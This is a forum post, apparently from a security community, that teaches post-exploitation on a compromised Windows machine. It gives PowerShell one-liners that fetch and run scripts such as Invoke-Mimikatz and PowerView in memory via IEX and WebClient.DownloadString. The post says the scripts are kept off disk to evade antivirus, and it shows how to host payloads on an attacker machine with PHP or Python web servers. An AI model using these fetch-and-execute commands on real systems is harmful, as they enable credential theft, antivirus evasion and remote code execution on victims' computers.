Announcement

Collapse
No announcement yet.

Powershell - Execute a PS1 file from the Internet

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Powershell - Execute a PS1 file from the Internet

    Having gained access to a Windows computer is when the fun starts. One way of making exploitation easier is to use one of the many ready-made Powershell scripts available from the Internet. Popular scripts are PowerView, sql_cmdlets, Get-PassHashes, Invoke-WMIExec, Kerberoast and of course MimiKatz and others.
    These can all be downloaded directly from the Internet if the victim computer has Internet access. If not, it is possible to host these Powershell scripts directly on the attacker machine.

    It is easy to use Apache as a web server to make these files available over HTTP. Other easy alternatives for Linux could be to use PHP with the -S option followed by the IP address and port number the PHP web server should listen on. Giving IP address 0.0.0.0 will allow PHP to listen on all available IP addresses the attacking host has available.
    Code:
    # php -S 0.0.0.0:80
    Another way is to use the Python simple HTTP server module which by default listen to all interfaces on the attacker pc.
    Code:
    # python -m SimpleHTTPServer 80
    One advantage of using these are that you will immediately see any requests received without having to tail a log file. The root folder of these web servers will be what ever directory you execute the command in.

    So how do we download and execute Powershell PS1 files from the Internet? Here is an example of how you could download the Invoke-Mimikatz.ps1 script into a variable so that the script will never touch the hard disk. This is important to keep these scripts away from the disk because traditional pattern matching antivirus software will scan files that are accessed or written to disk.

    The skeleton script could look something like this:
    Code:
    $browser = New-Object System.Net.WebClient
    $browser.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
    IEX($browser.DownloadString("<URL>"))
    Even though the code is fairly self explanatory I will mention the Proxy.Credentials part will present the logged in users credentials to a proxy if that is needed for Internet access.

    Downloading and executing Mimikatz will look something like the following:

    Code:
    $browser = New-Object System.Net.WebClient
    $browser.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
    IEX($browser.DownloadString("https://raw.githubusercontent.com/Po...e-Mimikatz.ps1"))
    Invoke-Mimikatz
    As with everything else there is more than one way to do this and more that one place to find Mimikatz.

    Code:
    mimi = $browser.DownloadString("https://raw.githubusercontent.com/Po...e-Mimikatz.ps1")
    Invoke-Expression(mimi)
    Pretty simple! Of course above example assume an internet connection but downloading this using HTTP from the attacker pc is a simple fix. You will need to have the ps1 files that you need downloaded in advance and in that case you do not need the credentials for the proxy.

    An alternate way of downloading and executing PS1 scripts is the following method.
    Code:
    powershell "IEX(New-Object Net.WebClient).downloadString('http://<host/ip>:<port>/<file>')"
    You can change the default port 80 to something that fits you better if you need to. That goes for all the examples in this post. As in any browser you do this by adding a colon after the IP address or hostname in the URL, followed by the needed port number.

    If you are completely sure that the Powershell script you are planning to use is safe from antivirus and EPP software you can import a PS1 script directly into Powershell with below cmdlet while in a Powershell shell. Of course you will need to have the module in place also:

    Code:
    > Import-Module .\powerview.ps1
    This module can be removed using the Remove-Module cmdlet if you have the need to do so. And it is possible to verify which modules you have loaded with the Get-Module cmdlet.

    Happy hacking!
    Last edited by Resheph; 06-04-2018, 08:43 PM. Reason: Added alternative way of downloading and executing using powershell.
    Certified Security Geek
Working...
X